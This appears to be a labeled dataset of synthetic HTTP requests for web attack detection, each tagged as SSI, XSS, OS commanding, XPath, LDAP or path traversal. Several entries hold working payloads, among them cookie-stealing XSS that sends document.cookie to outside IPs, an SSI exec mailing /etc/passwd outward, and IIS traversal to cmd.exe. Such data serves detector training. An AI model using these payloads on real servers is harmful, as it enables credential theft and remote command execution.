Start - Id: 39491
class: SSI
PUT /liViLTPQW/hi7efrmotisidOsasn6l/eznj42X/iPcdahsa/Y4allGrmQ4/iRbAfXMxC@yrnD0/2SKais_MM10X1juqA/nea0mrhYeh2B.php4? HTTP/1.0
Content-Length: 55
Content-Language: co
Content-Encoding: compress
Content-Location: /ld85/eeyll9oc.mspx
Content-MD5: NmxoYWFzem5hb1JsOTdueg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Jan 09 19:11:48 GMT
Last-Modified: Sun, 11 Jun 06 10:32:21 CET
Host: www.SiaZsrrks.uk
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: deflate, compress, identity;q=0.9, identity;q=0.9
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Cookie: zooswneo6tCqnCu=76559383;d6klt=66191669;oaorHzl=e61XZcDj;suvcgumnnn=361;PNrUB93qQY=<!--#email fromhost="www.ii7e9a.com" tohost="mailbox.rmhoe.com" message="zwheto qwyOdp he HNo" fromaddress="mana.com" toaddress="strw.hkh.com" subject="gne" sender="4yg.com" replyto="hrtti.com" cc="c3" inreplyto="my tbcE ot" id="oermail" -->
Cookie2: $Version="60"
Date: Sat, 07 Apr 07 24:48:14 GMT
ETag: W/"5.XvBUTVvPCjRElg8J"
If-Match: "L.6EzSmThnSm@45AAVpO"
If-None-Match: "j_zcxY5NF.6GS6Vjb"
If-Range: Thu, 20 Oct 05 09:33:01 GMT
Max-Forwards: 7
Pragma: no-cache
Referer: /ieefr/oosnx/xtss/yHamfsas.css
TE: gzip,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 4.1; bf-or; rv:5.4.6) Gecko/04570600
UA-Pixels: 9181x194
Via: 3.5 123.10.99.36, HTTP/5.0 www.nyglav.shtml
Transfer-Encoding: compress
Upgrade: hi8a/7.6
Warning: 942 6.71.33.5 "mnrm" 
X-Forwarded-For: 198.37.12.251
~~~~~: ~~~~~~~~~~~~~~~~

Nttrahisc=eere0I&etciframe_XL=19652556&tiieiie2=8897198

End - Id: 39491
Start - Id: 48019
class: XSS
GET /q84ZMHi/tmrPtS-yiRmBNiKk/OjdA@YX/eqjqeB7/osoiiqrewu7es.swf?aidsbror3Eyaer=210sEF4&nddhv=09401172&ihvn4msfo=4151201235&eTmTio8eetss6=0&ot9eEeuefgn=sLe&etWeyK=3cOB&keNweaeGt=88835&fomnrEjt9=b3AC%40p&obo4iiakh=d6olb8ufscript0alos&maSdhtWtA=oe38hswinntgs&esh=%3Ca++++href+%3D%22++++about%3A%3Cs%26%2399%3Bript+%3E%5Bwindow.open%28%27http%3A%2F%2F195.172.184.177%2Finet.dll%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E++%22+++%3E&vandlx.aJZPCus=dconnect%7Ch&docH=dAAol&AyuHhf0le3LbBw=yeItsflqmftR39sj&taAwvqden0h=e HTTP/1.1
Host: www.p4s6.biz
Connection: tT3sfE
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 229.36.28.9
Cookie: LlD=dagybe0uobyllpsrch;utetmyaardeNoi=s
Cookie2: $Version="114"
Date: Tue, 22 May 07 11:07:53 CET
ETag: W/"3x8koRullY4pvrSR5ZMs"
Expect: aVnq
From: uesois@ewrsoxtt.it
If-Modified-Since: Mon, 07 Feb 05 03:17:30 CET
If-Unmodified-Since: Sat, 22 Sep 07 11:24:24 UTC
If-Match: "SJV5JT00eWtcq0Pwh"
If-None-Match: "iqwEhKo9ppbJH0qznJ4F"
If-Range: ".6jFGOSY_aziZRVb"
Max-Forwards: 9140
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: Basic bmxhaWtFZmc6dG5iZ25kbw==
Range: 3837-2
Referer: http://www.ptje.de/ligh/iij4Nyi/rgsars8m/zcewwnt/eyrwt.pl
TE: deflate,deflate;q=0.8
Trailer: Referer
User-Agent: b1Mmsxredo/9.8
UA-CPU: 68000
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: 2.7 www.satyol.shtml, ninng/7.3 2.16.14.183, 4.7 www.5us8s.js
Transfer-Encoding: gzip
Upgrade: DUyx4/6.1, udlo5/7.2
Warning: 237 106.180.134.229 "4e4socieooaey" "Fri, 14 Dec 07 11:55:14 UTC"
X-Forwarded-For: 97.134.190.82
X-Serial-Number: 698729021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 48019
Start - Id: 43050
class: OsCommanding
PUT /yVuwVdYKW/d0ZGEWTexbaWU5B1o/dfvpqsF59r-/wreuuar/XATcatW1vobjectUgvp1/arleS/l6ai1gi91r0o9/4WyIUaqLMq3J/eqAcB0NvQjo3KyP/e@3QfQoEWMQmFS-/eeIB/kP_ItGqIy34B.gif? HTTP/1.0
Content-Length: 34
Content-Language: ohddnyS,oifir4au,l
Content-Encoding: deflate
Content-Location: /4so9h/NrMfdla/oeYoewat/iGs5.png
Content-MD5: aHFlb21uaWZhazl0cmVtTg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Feb 06 14:56:39 UTC
Last-Modified: Sun, 29 Apr 07 16:36:41 GMT
Host: 223.84.5.70
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-hebrew;q=0.9, iso-8859-15, windows-1257, x-mac-ce;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 241.8.137.249
Cookie: eCRcQV7=qWieoD7hdlsdcugTk;oniuy=etrq2tcIs;teN=6dlraow;asb=eoose7okaehvh6
Cookie2: $Version="392"
Date: Mon, 15 Jun 09 20:35:58 UTC
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Mon, 18 Aug 08 07:38:29 CET
If-Unmodified-Since: Sun, 30 Mar 08 18:38:01 GMT
If-Match: *
If-None-Match: "NS-oM20eC2jQsTJCdd"
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 769
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: zsep nMmthn=eott2h
Range: -18591
Referer: /9seil8/ientsbra/F5edoRR.pl
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Otran9o (ntzzcd5O; nOap.4)
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/3.4 128.222.125.208:8399, 5.2 www.erase3.gif, FTP/5.4 www.biea4res.jpg
Transfer-Encoding: gzip
Upgrade: tun3o/7.3, omna/4.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hwie=gf&enitueeed=|    id    |

End - Id: 43050
Start - Id: 40032
class: SSI
GET /cdKxA/a2Wy7@N/smMSB2j88dKdXJovz/mv/RSdeleteMML/RQ07CYi3.bin?haueOopaloid=%3C%21--++%23exec+++++cmd%3D%22%2Fbin%2Fls+++++-l+++++%2Fhome%2FeryAnpaqse%2FreiY6nnot%22+++--%3E&hckAafeiw6ejrie=ooeh&6f=8336440&gU0t=ntrrarXeeaor2tET&tosdyadeffapp=dm1htrN1rHel&zaet0a=6419436513&03HdVKc=soV&dafaec5ecvteipe=tr%2F%406+positionA&loat3oreotAa=fs%5D%24e&oodpd=ty%3B%7C%3C&eyilips6=8htDs%26r&YeuIeG=%27+eOt%3Fareplacet&c1QNJy=82683&Hde4niinEtokili=+ee HTTP/1.0
Host: 151.170.169.193
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-roman;q=0.7, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 160.214.20.200
Cookie: denuaajnNhmzm=insertar1zgdntRNi 7ed;7c0Ua0msifzCji=htE ;in=432253
Cookie2: $Version="286"
Date: Fri, 26 Feb 10 06:58:33 CET
ETag: "1oi95JajISSvSc6NmwV"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Sun, 02 Aug 09 24:28:10 CET
If-Match: "77d_Pwm.H9OmVXcH0"
If-None-Match: *
If-Range: Wed, 15 Feb 06 08:22:34 UTC
Max-Forwards: 5
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: oSary tpnt=cjNb5ce
Range: 41683-1312,-3
Referer: /sJzas1m/otybe/lefmr7h/meiwc.txt
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: t9lecnel (f@EihqU; h14_2ItKW)
UA-CPU: MIPS
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: compress
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40032
Start - Id: 48690
class: XPathInjection
POST /meat2cscou5ix/2dhbuIa.css? HTTP/1.0
Content-Length: 201
Content-Language: 0gr2wa,gnoho,eresm
Content-Encoding: deflate
Content-Location: http://www.narptth.fr/ltjbeeh/eheln/vew7tt5/b8iq9S/ttwnsmi.asmx
Content-MD5: TWc4ZnlzZ2VsdHd0NG9pNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Sun, 14 Aug 05 01:13:46 UTC
Host: www.eia4r.uk
Connection: enlnot
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=15
Client-ip: 235.129.193.205
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Fri, 22 Jan 10 14:34:53 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
If-Modified-Since: Tue, 27 Dec 05 08:50:23 GMT
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: *
If-None-Match: "dM7Chkcs3tfp6l6SM"
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 640
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Referer: /Md5ot.js
TE: trailers,gzip,trailers
Trailer: Accept
User-Agent: SitheaSe7/5.8
UA-Disp: 5095,3013,8
UA-Color: color16
UA-Pixels: 640x9904
Via: HTTP/0.0 103.167.214.94, HTTP/2.6 www.aninteN.html, 7.3 85.137.81.24:732
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
X-Serial-Number: 3185085450816900238
----: ------------------------

ntN=ssce6sda'     or nlesi/lo/child::node()[processing-instruction()=13] or    'ebkrsidd'  ='&zl8gom7=/Oe&tWC7=3097388&d0Lee3n4tlroau=125094&if=rjWB-tPM&e9=ttFgPysu5el

End - Id: 48690
Start - Id: 36633
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 242.8.172.110:68557
Connection: close
Accept: */*
Accept-Charset: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 159.33.177.101
Cookie: ileDrge=os 
Date: Tue, 29 Dec 09 05:06:39 UTC
Expect: 100-continue
If-Modified-Since: Sat, 04 Mar 06 02:16:31 UTC
If-Match: *
If-None-Match: *
If-Range: "weAXubksETS8uuD"
Max-Forwards: 36
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cmNlcGdhbnd0b29yM25lYWlvZWVFYWQyYXJtWXNlbkRhbXJqaDRsaWV3
Referer: /weotR.jpg
TE: trailers,trailers,trailers
User-Agent: Mozilla/5.5 (compatible; etheezcro; Unix; pPv9Rdo; ip4liokne; e0bsS)
Transfer-Encoding: deflate
Upgrade: tanoeu/5.3, o1rivx/6.2, nfr/2.4, tnwl/0.9
X-Forwarded-For: 43.56.144.162

null

End - Id: 36633
Start - Id: 39904
class: SSI
POST /eernznda/i2wapx/sTaWRWGM@sDqYpp5/eknmKgO4n2fHW/tsbgS4so/wUCAqawget9z/tcmixmyaomb/ie/blreoee4xvstnsTtP6i/6Ys3l9zy6en@.9Ll6LrZ.shtml? HTTP/1.0
Content-Length: 147
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Host: www.entlneoptd.biz
Connection: keep-alive
Accept-Charset: windows-1253;q=0.5, euc-kr, iso-8859-8
Accept-Encoding: 
Cookie2: $Version="47"
Date: Thu, 21 Sep 06 12:57:11 CET
ETag: "LcgSnpA@w-i3zxL9"
Expect: h0il
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 15 Jul 07 11:15:58 CET
If-None-Match: "P21DGjgZVEHk11FaG6"
Max-Forwards: 175
Authorization: Digest cnonce="DmWeetx"
Referer: /emxt/isrmhr/y33tn/ot7klai/adEaInee.mpeg
Trailer: If-Modified-Since
User-Agent: yriekp8arsas1k

9diohhrsqk0gro=plub3 h;xibin&scriptkIx=<!--  #exec   cmd="/bin/mail     ldinnFoaw.com  < /etc/passwd"-->&5e.NCnOG=9274755

End - Id: 39904
Start - Id: 40342
class: SSI
GET /qai7mloaOiaccr/oLS2aviACa/nFs04SdFE/renytq7yIs8/r5hgW4aOor5snRRe7/y8widoitrtslte5z9no/PIt8SVlLscript751mIz/Ic1rmX6HEcK/eh_l-O/dSPqutBC2nQh9/tzS@Kj9Py41pbv.js?uRsxlehe0rdoep=%3C%21--+++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CTxi6pr%5Co3Reektea%5Crosi.exe+++d%3A%5CueE8tedk%5Cwww.nsorrialns.org%5Cog3bAge%5Cdatabase.mdb++++%2Fx+exporttofoxpro%22--%3E&2rsn8i4eob=forhTf1l%5Cey2%5C&uncbtmddAi8gO=e-nvxf-%40&IQ25G=m&b9ruda=TunTP&0inogents=na&ygtmas5scclr8eo=76r&yeniplrrsbsj=aE&X-UVp5nO=eoxoAieymtr&sZyeNeeuf=ieDr HTTP/1.1
Host: www.trh1w3a.it:82
Connection: gf5u
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: otlxu-t, qtmnt-tsigy;q=0.0
Cache-Control: max-age=6874
Client-ip: 29.195.65.50
Cookie: bomut= echou|skat k%ts?;kthEehnmyR7c=ss;lapdjesttantnr9=82;newaw=3300;uJEiVnN5ui=ihne
Cookie2: $Version="3"
Date: Sat, 10 Mar 07 24:51:41 UTC
ETag: W/"sixONzZFOaxVNExZ-Zd6"
Expect: 100-continue
If-Modified-Since: Thu, 03 Jul 08 04:44:21 UTC
If-Unmodified-Since: Sun, 26 Aug 07 23:51:29 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Jun 05 18:42:08 CET
Max-Forwards: 3
Pragma: no-cache
Range: -601,-84841,57-6653
Referer: http://mtey0e.st/dtrtwhht/IvtDtx9/uinef.avi
User-Agent: Mozilla/0.6 (X11; U; Open BSD i386 4.1; ls-ts; rv:0.0.8) Gecko/63858091
UA-OS: Windows NT
Transfer-Encoding: compress
----: --------------------------

null

End - Id: 40342
Start - Id: 47707
class: XSS
GET /tcjfotgieyena0l/udv7L8on6ZG87A0vGEd/LND/wityl7kte9oem/slhSe5ttg/0lotijiey7nttlqeynt/rtWUl17jU3LBwP._.gif?tVMU=ee&23Heob3X=%3Cimg+++++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F221.41.162.162%2Ftrie.aspx%27%2Bdocument.cookie%29%3B%5D%7D%3B++%3E&quUUz10=666773&Eyltetqho=867&ooapra2t=56689&uft1etutdzvcfm=39609576&Igroup byXWW2uz=hwhereEo HTTP/1.0
Host: 3.244.177.219
Connection: ogxdP
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip, deflate, compress;q=0.4
Accept-Language: nnitebt-E;q=0.0, tiA-tcieOs, oa2-nisi, es-r6r3, d-tlDaaO
Cache-Control: min-fresh=701
Client-ip: 182.94.84.233
Cookie: @6V2_styleLhaving=dgaaumiWDS
Cookie2: $Version="88"
Date: Wed, 18 Oct 06 03:47:04 UTC
ETag: W/"z0fMF@.Ed8sBGjwF"
Expect: eAkt=es3Stmno
From: saib3@Tioc.com
If-Modified-Since: Thu, 11 Jan 07 13:05:34 UTC
If-Unmodified-Since: Fri, 20 Feb 09 19:51:16 UTC
If-Match: "jnEpRFfbpJxztvo-zN_6"
If-None-Match: *
If-Range: "a4D8OMC2.e9SlXrsbi.-"
Max-Forwards: 569
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bG9idHRpcnNjc2hpc2hlY2U0ZWRuMXExMXVlaGhIdG9pcnA2dWdlZG8xZGFh
Authorization: Digest realm
Range: 37-9480,573294-46248,0850-768
Referer: http://www.g7mKs5G.uk/ea0opcu/Aihrnein/pJoezi.html
TE: trailers,gzip;q=0.4
Trailer: Accept
User-Agent: nJr0ug http://www.oor5w.fr
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5167x472
Via: 5.5 www.MeeeIlNu.png, FTP/9.1 www.meei.tiff, 8.6 www.9ieiseh.html:063
Transfer-Encoding: identity
Upgrade: rNtt/7.8, woes/8.3, tse/0.2, vktO0r/0.2, suere/2.3
Warning: 328 www.rri2Tey0.htm "ndrOro" "Wed, 18 Nov 09 04:33:59 UTC"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 00056552698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47707
Start - Id: 38056
class: LdapInjection
GET /eIvwsIpdqkTw_Pm2n6K/eS/7o3cRhcs/veren/9wfogdwdt2sinn7vt/rwbh8iORo.9.6@cZyE3/aexsraronuw5l/tOV/t0s/B19HKOaccess_logxHvbd2xwget.php3?euacl8l6=icsepioybpSeeEr&itbhao=%29++%28+%7C+%28oSRbg%3DEa*%29 HTTP/1.1
Host: 136.15.232.15:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.4
Accept-Encoding: deflate;q=0.5
Accept-Language: 3-t5e
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: oiqrozW=jzqlwocei;agogpdtraaiu=56;thobslqe=t5a;xRgG5Dyselect=5482;soRmLnOmqatqdah=06595650;7aqeuuoowrv=4302081613
Cookie2: $Version="7"
Date: Wed, 13 Aug 08 24:10:06 CET
ETag: W/"h1oRPtR-U-jQCsTW7"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Fri, 03 Apr 09 07:52:24 GMT
If-Unmodified-Since: Sun, 16 Dec 07 01:53:47 GMT
If-Match: *
If-None-Match: *
If-Range: "MZwTWq@x4WC_wAWR9_"
Max-Forwards: 6
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nc=7E5Fa629
Authorization: Digest realm
Range: -5,-848,5-
Referer: /irwms/sn9noem/sm20ses/lnsS.pl
TE: trailers
Trailer: Warning
User-Agent: onelteaL/9.7.2
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: tWq/1.4 174.205.206.12
Transfer-Encoding: ieiyT; tesamaNh=xy2s
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38056
Start - Id: 47939
class: XSS
GET /edhds.jpg?lalnd=bcEi_&ta1gey3tletosE=b53cemRoefbRtt&c9nwsycda7na=yn8sluss4neOewib&eScremeyrswmp=37&tsdbsq=%3C%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F210.235.179.236%2Fndicro.php3%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E&oWteouo2tea=0&vhlom=axP&b6sezoxtv3oeog=065050&AMyLs67tmpeL5=0196&8l8nb=aia HTTP/1.0
Host: 208.85.114.119
Connection: keep-alive
Accept: image/*, text/*, image/gif;q=0.4
Accept-Charset: iso-8859-3;q=0.2, x-mac-turkish, x-mac-roman;q=0.8, windows-1255
Accept-Encoding: 
Accept-Language: arrl8pir-ihn;q=0.3
Cache-Control: no-cache
Client-ip: 233.205.30.192
Cookie: hZ2KzdSRa85Z=L2dfdCOvd
Cookie2: $Version="16"
Date: Thu, 04 Oct 07 13:36:29 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Thu, 08 Mar 07 24:43:13 CET
If-Unmodified-Since: Tue, 06 Jun 06 23:18:59 CET
If-Match: "LoOLTQrV99mx-ZoO"
If-None-Match: *
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 1875
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: NTLM Q2J0c25nczVSb2VMb3NvdHJkOHJpTkUzZWVwYXRlaUM5b3Nub3ZvdQ==
Range: 986919-,798-764614
Referer: /welo/uenyro/uUnwhu/nwdiuk6i.cgi
TE: trailers,trailers,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: io9ECC/1.2
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 929x206
Via: s5sc/1.9 250.182.36.53, 2.8 www.ephee9t.jpg:45
Transfer-Encoding: fL6YG
Upgrade: revs/4.9
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47939
Start - Id: 37006
class: LdapInjection
GET /hs9fudpeK-GyL-jHtp.msf?z8SzRx=ckae%29%28%7C%28tdetE%3D*%29 HTTP/1.1
Host: 135.126.145.199
Connection: keep-alive
Accept: text/*, text/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 134.238.253.203
Cookie: 6ae=46407;te1io5301IorE=nfftp;rqauin=91742;eot8irw=5265145;ysthuoeoi=|5;urnt=14
Cookie2: $Version="554"
Date: Wed, 06 Feb 08 01:26:49 UTC
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: 100-continue
From: ullaa@pmrm.cz
If-Modified-Since: Sat, 14 Apr 07 21:25:48 GMT
If-Unmodified-Since: Wed, 26 Nov 08 06:19:05 GMT
If-Match: "63w1is9@LL@QTw0CiXV0"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: *
Max-Forwards: 336
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: NTLM cGxyT25vaHU2OWFtc2ppaThodDdqWW1oekNjbHdlUmFlc2JlYWZlU2V0WWV0
Range: 11-,-9658
Referer: /dd2ts.php4
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: lVLtJGtaEd http://www.arMs.fr
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: compress
Upgrade: iau/2.7, aaats/5.8, esnnf/4.0
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 37006
Start - Id: 45186
class: PathTransversal
GET /./? HTTP/1.0
Host: 220.29.65.78
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-8859-3;q=0.5, windows-874;q=0.4, gb2312
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Thu, 26 Nov 09 05:01:42 GMT
ETag: W/"Om2MM2xg9YxaUgf@.A"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Sat, 15 Jan 05 18:53:28 GMT
If-Unmodified-Since: Sat, 10 Sep 05 11:25:42 UTC
If-Match: "xgznTSO9INjdkIy1E"
If-None-Match: *
If-Range: Fri, 16 Jul 04 05:10:34 UTC
Max-Forwards: 747
MIME-Version: 7.0
Pragma: eeb=iNttnn
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest algorithm=MD5
Range: 551-3881,-846
Referer: http://7lfmx.uk/sucyWT/ie1inrrb.sh
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/7.1 (X11; U; Unix 9.9; wn-ch; rv:6.4.6) Gecko/07396155
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: HTTP/9.8 186.248.208.45, FTP/8.2 www.ulleefa.html, 7.0 168.238.64.146:97
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45186
Start - Id: 46951
class: XSS
POST /d3/lw6FmfwDSWWia@.bin? HTTP/1.1
Content-Length: 271
Content-Language: 0TA
Content-Encoding: identity
Content-Location: /ce87asak/nwatht/ynoati/O6ebzhr5/baatawWo.conf
Content-MD5: bnJ3aW5lc2lBN2xlbGh1VA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: 76.222.154.97
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-2022-jp, hz-gb-2312;q=0.6, x-mac-hebrew, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 15.111.69.143
Cookie: geebansc=e8vEkOUN;eiabov0mreurf=zgNIeySc9H;zdcbinZH3=egiisxyzir\nr2
Cookie2: $Version="425"
Date: Tue, 03 Jun 08 20:41:09 UTC
ETag: "NViduy7oqvlSc-i"
Expect: mexltil=sUytWu
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Sat, 08 Sep 07 02:06:19 GMT
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://www.dtaot3.net/ecdrh8sc.jsp
TE: gzip,trailers,chunked;q=0.3
User-Agent: cEaness9i (sBqHzxVF5; bV0br4id)
UA-CPU: StrongARM
UA-Color: color8
Via: 5.3 151.186.75.226, FTP/8.3 www.dyeahsn.gif
Transfer-Encoding: compress
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pD2wh=g]e<te~&e1omnyrM7ey=t(nteoof=n&@UIP=zadmleo&hUY5Vdi=<a  href ="    about:<s&#99;ript   >[alert ('IOmAe');]</script    >     " >&ewmoR6wnS=0480863117&sne=nligt02&uqhi=aOxl&o3tamN=js5uganeEnrsl4c&I6HVpWfqs_2=0238017

End - Id: 46951
Start - Id: 44209
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 82.204.84.235
Connection: hshts
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip;q=0.8, deflate, gzip, identity
Accept-Language: *
Cache-Control: min-fresh=668
Client-ip: 99.103.6.37
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Wed, 31 Aug 05 09:40:43 UTC
ETag: "KxyMqNAT9Wpl8gi0Q"
Expect: 100-continue
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 27 Nov 04 18:10:53 UTC
If-Unmodified-Since: Sat, 22 Mar 08 02:52:10 UTC
If-Match: "q5R_iJd7rkezGVZ"
If-None-Match: *
If-Range: Thu, 04 May 06 08:33:18 CET
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: wt8a8 s4Ybtod0=iqtnro
Range: 09660-850419
Referer: /4aJu1eom/namz/7aie.php3
TE: gzip,trailers,chunked;q=0.6
Trailer: User-Agent
